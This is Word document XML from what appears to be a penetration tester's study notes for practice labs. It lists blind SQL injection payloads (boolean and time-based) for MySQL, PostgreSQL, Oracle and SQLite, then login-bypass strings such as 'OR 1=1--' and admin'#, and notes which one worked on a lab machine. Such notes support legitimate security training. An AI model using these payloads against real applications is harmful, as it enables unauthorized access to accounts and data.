    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL / MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000170F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001710">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001711">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND SLEEP(5)-- -</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001715">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001716">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001717">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001718">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001719">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' || pg_sleep(10)--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' || (SELECT CASE WHEN 1=1 THEN dbms_pipe.receive_message('a',5) END FROM dual)-- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001720">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001721">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001723">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="662"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001725">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001726">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017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28">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bpf5ggrrt34u" w:id="191"/>
      <w:bookmarkEnd w:id="191"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL authentication bypass (to get past login page)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001729">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While we've been focusing so much on SQL injections, we need to make sure not to forget the basic authentication bypass that we can do with SQL, like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1278"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL authentication bypass was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId472">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cockpit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used </w:t>
      </w:r>
      <w:hyperlink r:id="rId473">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list of things to try</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001730">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;username&gt;' OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001731">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'OR '' = '  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001732">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the one that worked for Cockpit according to </w:t>
      </w:r>
      <w:hyperlink r:id="rId474">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1733">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allows authentication without a valid username.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001734">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;username&gt;'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001735">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select 1, '&lt;user-fieldname&gt;', '&lt;pass-fieldname&gt;' 1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001736">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001737">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001738">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001739">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some more SQL Authentication bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this into the username section and put some dummy value in password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test' or 1=1;-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
